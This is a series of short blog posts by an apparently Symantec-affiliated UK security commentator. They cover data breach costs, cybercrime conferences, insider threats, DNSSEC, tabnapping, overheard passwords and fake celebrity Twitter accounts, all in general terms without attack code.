Last week’s Cost of a Data Breach Study update had one particular statistic that stuck with me and to which I keep being drawn to when discussing it with others. In the UK study, they discovered that where an organisation that suffered a breach had a Chief Information Security Officer (CISO) or someone with the equivalent level of responsibility in place, the cost per record dropped by an average of £18. I think the key word in the previous sentence is “responsibility” for a few reasons.
Firstly, we have the increasing amount of fines and penalties that can be applied to the individuals involved in failing to deliver against expectations. These have gone beyond the original highly regulated industries and out into the broader business context. With the coming updates to EU legislation, it’s likely to get more attention in the boardrooms of Briton, not less.
Secondly, and contrary to popular thinking, stopping data loss and protection of the key information assets an organisation has goes way beyond using scanners to prevent credit card details being emailed out. Primarily, it’s not a technical problem, it’s a people-process-technology challenge.
In the past, I have heard references to people-process-technology being like a three-legged stool of which you can’t remove any without falling off! This can be considered a fair comparison but, for me, the ‘people’ part of this stool is the most critical starting point. People have negotiation skills. People have perspective. People drive change.
When it comes to the role of technology in stopping data loss I view it like an exoskeleton to the people involved. That may sound a little sci-fi but what they need to be able to do is say “this stuff is important, please tell me how it’s being used, where it’s going and who uses it”. Technology enables them to reach into network pipes with gigabits of data pumping through them. Technology enables them to piece together a process involving four employees and an outside contractor. Technology enables them to see the HR director does not like using the VPN from his second home in the Cotswolds.
The reason I view it as an exoskeleton is that the knowledge of what’s important comes from the people involved, as does the appropriate response and the negotiation to get from where they are today, to a more secure future-state.
The relentless growth in information and systems shows we’re not moving towards a state where data loss won’t happen anymore. However, this report shows that if you put someone in charge with responsibility and authority to make change happen when it does occur, the impact to an organisation’s bottom-line is significantly reduced. I’m happy to predict the gap between those that take it seriously and those that stick their head in the sand will only get larger in the coming years.
Recently, I once again joined delegates from across the globe in Strasbourg to speak at the Council of Europe’s Cooperation against Cybercrime Conference. Bringing together industry, law enforcement, legal and policy experts, the conference marked the 10th year of the Budapest Convention – the first treaty for online crime that has aimed to define a common framework for cybercrime legislation.
In the decade since the treaty opened for signatures, 47 countries have signed, and 32 of those have converted it into local legislation. During the conference, seeing these countries stand up and proudly announce their efforts to implement cyber laws and, in some cases, even highlight early successful prosecutions, was a very powerful experience.
However, while the convention continues to represent a great step forward, with nearly 200 countries in the world it is important to recognise that there is still plenty of work to be done. Although I realise that not all of these countries are part of Europe, a precedent has already been set with non-European countries such as the USA, Canada and Japan signed up.
It was clear that The Council of Europe’s cybercrime initiative isn’t resting on its laurels with the conference highlighting the next phases we can expect. These include plans to implement training for judges and law enforcement, regional workshops and intelligence gathering and sharing, as well as, looking at the broader picture of international cyber strategy and the role that cybercrime plays in this.
The key topic that comes up year after year at the conference is ‘cooperation’ with the need and want for public private partnership seen as a key for success. As an example of collaboration, 2Centre (www.2centre.eu) aims to bring together academia, industry and law enforcement to drive training and create centers of excellence. Thus far centers of excellence are in the process of being created in France, Ireland, Belgium and Estonia, with requests for many others.
The other key topic is capacity planning. As countries develop legislation, a burden moves along the process. It puts new pressures on law enforcement to have the scalable resource to investigate, handle ever-increasing volumes of forensic data and independently take on the challenge of an internationally standardised evidence gathering processes and techniques.
When you consider these two themes together, a clear risk is apparent. As more collaboration takes place, there simply is not, at this point in time, the resource to scale to the evolving scope of cybercrime.
While security vendors, such as ourselves, could provide insight on the scale and scope of what we are seeing, with twenty plus new threats per second and given the increased interdependency of networks and systems, greater coordination between the public and private sector is vital. This can enable a common understanding, identification and recognition of possible cyber threats and ensure efforts and resources to address specific risks are effectively deployed. Information sharing partnerships have a key role to play in effective cooperation against cyber threats and can help to distill information into tangible actionable data that can then be used to address a specific risk and where possible provide alerts.
My overwhelming thought at the close of the conference was, however, that it’s always amazing to see such international cooperation. We all have a role to play and it’s only with all of our participation that we can succeed.
In recent years, I’ve attended numerous events looking at the subject of cyberspace and the related threats, so what made the event hosted by the Foreign Office different from those that have come before? One significant variation that comes to mind first is the level of international support – with 60 countries coming together. Consequently, this event has provided a real opportunity to take another step forward in the direction of getting international discussion and co-operation on how to make the Internet a safer place for citizens, for businesses and for governments.
During the conference, I took part in a panel discussing “Policing in the Cyber Age”, focusing on the need for collaboration between the various law enforcement agencies, industry and the security industry. There were some great examples of initiatives to support tackling cybercrime, such as Symantec’s Norton Cybercrime Institute, which provides information on the genealogy of attacks, training and support to law enforcement agencies and judges.
What is evident was that whilst organisations such as the Police eCrime Unit (PeCU) and SOCA (Serious Organised Crime Agency) are able to share some great case studies of how cybercrime cases are effectively investigated, and how cybercriminals have been caught and prosecuted, I heard other nations admit that they have had less success, with fewer than a handful of convictions to date.
What continues to stand out most to me are the additional hurdles and challenges that exist when dealing with cybercrime on an international level, from simple collaboration between agencies in terms of victim attribution, through to evidence and intelligence sharing. Consequently, it would seem that there are still legal and technical challenges and obstacles to developing partnerships needed to tackle cybercrime that unless addressed could become a cybercriminal’s best friend.
You could easily come away from such a conference feeling alarmed at the scale of the challenge still ahead but for me this was all positive for the following reasons: to start with, this was the first event of its kind, and there is already the commitment to repeat the gathering for the next two years. From my perspective, this is encouraging sign that actions will follow.
Secondly it’s only when we openly discuss the challenges today that we can start to see a way forwards, and much of this is about smarter collaboration (between governments, law enforcement, legislation and industry).
Finally we must remember that many countries around the world are at different stages of their digital development and cybercrime is a relatively young problem. Many countries are still trying to get to grips with what legislation, resource and expertise, to name but a few aspects they may need to address the problems they are facing.
My hope is that this collaboration can help to tackle many of these issues, yet even at this first event, some of the most fundamental challenges started to be addressed:
• Knowledge exchange and education are crucial
• The level of networking between people, organisations and countries attending can only help drive the global bar of cybercrime prevision
• Skilled experts in criminology now need to translate their skills into global cyberspace.
… or “Who will watch the watchers?” In a recent case a malicious insider has admitted, not of stealing information – but of, in effect, adding to it. As an IT insider he had access to the systems which dealt with loyalty cards and set up a number of bogus accounts and then filled them with points… that he could later spend.
A great deal of time and effort goes into protecting systems at the endpoint or servers in the datacentre and companies now at least acknowledge the insider threat… but when it comes to applications there is still a naivety of “all our people are good”. Which brings us to who is watching the people who are supposed to be watching the systems? Unfortunately there is very little that can be done to stop the determined malicious insider – after all they have the access to the systems given to them and often they carry out tasks they are supposed to, given that they have the authorisation to do so. However, this is where good application design and usage policies can help. For a start, all administrators should have their own usernames and passwords – no sharing. There should also be good logs / audit trails, especially for functionality requiring additional privileges. Finally, there needs to be some means of reviewing the log files – either automatically or manually… and preferably not by one individual (otherwise they could become the malicious insider). Often just informing people that this functionality and policy is in place will deter the potential casual insider… and for those who are not deterred at least you now have some evidence.
Today the Domain Name System Security Extensions (DNSSEC) protocol public key gets added to the ‘root’ name servers. Some commentators such as Alex Pawlik quoted in ZD Net predict it will be a ‘Black Thursday’ for cyber attackers with malicious DNS re-directs becoming a thing of the past. I’m not so sure we should talk about this in terms of it being a panacea but it’s certainly a step in the right direction.
The implementation of DNSSEC has been a long time in coming and each milestone passed is a very necessary step in the right direction. The signing of responses from the 13 root zone server clusters today should be seen in that context—it’s a start and a very big start. However, any expectation that this milestone marks the date that the Internet suddenly becomes safe is exaggerated.
To be effective, DNSSEC needs to be implemented down the whole DNS chain, from the root down to your ISP or company, so there are still many more milestones to be achieved before DNSSEC can achieve some of its promise, even if cyber criminals don’t identify ways around the signed response safeguard.
With the news that a couple of Android apps have been pulled as they misrepresented their purpose (they were used as research – duping users into downloading and installing them – to see if people would), it raises an(other) interesting question for IT departments around applications, mobile devices and keeping up with the user.
While companies have been getting stricter at what can and cannot be installed on corporate laptops, the same is not true of smartphones. There are now tens of thousands of apps for phones like the iPhone and Android, and while they do have to go through an approval purpose, it won’t be your corporate one.
I have recently been involved in writing security policies for a number of companies and it becomes very apparent as to the need for up-to-date polices coupled with a suitable education programme. Technology is moving rapidly and care needs to be taken to protect corporate data wherever it is and however it is accessed. Updates to policies are worthless if they are not effectively communicated – this is a case in point – updating the policy on downloading apps won’t stop people from doing it if they don’t know about it. If you have technology to prevent inappropriate apps from being installed on smartphones, great – if not, then you need to remind staff of some of the dangers of just downloading and installing apps from the web.
Cyber criminals go after the low hanging fruit and the smartphone is just that – a simple way into a person’s life and potentially the corporate network.
We have been talking about Information Security for a few years now, but with the changes in legislation earlier this year that means you can incur £500K fines, it’s time to look beyond the reactive and towards the proactive. Time to move from Information Security to Information Assurance.
So why Information Assurance rather than just Information Security? Businesses rely on information, and most realise that accurate, available and appropriately shared information is key to growing a business. Conversely, missing or inaccurate information in the wrong hands will damage the business and potentially the business’ reputation.
From a security aspect, it is only the security of the information and systems that is taken into account. Data loss prevention and all the, now commonplace measures to prevent it, coupled with endpoint and datacentre security strategies enable companies to ‘tick the box’. Reporting and auditing are key for this to be provable so that information is kept safe and the newspapers and legislators held at bay. Assurance is all this – and more! Information assurance is about assessing the business’ ability to keep the information safe and that it is accurate and available - to the right people at the right time. It’s about developing a shared understanding across all areas of the business as to how information is used, and its about improving the information available according to business priorities.
As we start to move out of recession, but while the purse strings are still being tightly held it is time to revisit information strategies and look at how information can be used more effectively to drive the business. New rapid assessment services are starting to appear which can build on your information security policies and turn them into information assurance ones.
… What? A new browser-based threat has been created – just to show it can be done. However, rest assured, this will be used for real in the near future. It’s called Tabnapping… sort of like kidnapping, but with the tabs on your browser. The way it works is that you visit in infected site and when you navigate away from a tab, it changes the tab name and the content.
The social engineering at work here is that most people have multiple tabs in their browsers open at the same time – and they don’t really remember which is which (why would you?) so you click on the one you think you need (but it’s been tabnapped) and you reenter details… mistake! As for how easy is is… take a look at this page which shows how it works – then open another tab and wait 5 seconds and return to the old tab!
What to do? Well, the problem with these sorts of attacks is that they are tough to break as there are legitimate uses for the functionality used – think about auto-logout from online banking systems. So… the best way to combat it is to educate people as to the risk – send out an email today! (Of course, hopefully you will have anti-malware installed as well – which will help prevent you from going to dodgy sites etc…)
I was on a train yesterday and couldn’t help but overhear a conversation that went something like this…
“He’s sent me the mortgage details on email… could you get them for me and tell me what it says?”
“Sure, I use XXX, my username is YYY and my password is ZZZ.”
Good grief… I thought everyone knew that you were supposed to keep usernames and passwords ‘secret’. Evidently not. Of course this is the basic problem… people are trying to do something important to them - and are not thinking about security.
There are instances where sharing confidential information is required, and when in ‘work’ mode, people (sometimes) think twice about who can overhear but move into a non-work mindset and common sense disappears. In this instance, it would have been better to have waited until they could check their email themselves, or wait until they could find somewhere more private to speak, or even to have SMS’d the details (ideally in more than one text). In fact anything would have been better than shouting the details on a crowded train.
Oh well… it serves as a good reminder to us all that you should think twice when dealing with confidential information, especially when in public places. Cyber-criminals are not fussy how they obtain the information they need… the easier, the better.
PS A quiet word to the person on the train as I left suggesting that changing their password would be a good idea as everyone in the whole carriage now knew it – seemed a reasonable thing to do. Of course whether they do it or not… time will tell.
Football star David Beckham is the latest victim of a worrying scam by online fraudsters using the popular social networking phenomenon, Twitter, as a vehicle for spam advertising.
According to Candid Wueest, senior threat researcher at Symantec, the fraudsters create a fake Twitter account, often in the name of a celebrity, and then attempt to become followers of legitimate Twitter account holders.
“In this case, the false David – an online Chinese retailer – followed over a thousand accounts with a single common link – the account name contains the word ‘candid’.
“The credibility of the fake account is bolstered by other fraudulent accounts linking back to it and by cross-following legitimate Twitter accounts, which have been hacked,” he says.
Wueest confirms that this type of malicious activity is fast becoming common practice and adds that the rogue tweets often include short links pointing to infected websites.
“This proves that spammers are keeping abreast of new technologies. Twitter users are advised to carefully check out the details of all prospective followers and never to respond to ‘suspicious’ direct messages,” he says.
Peter G Rae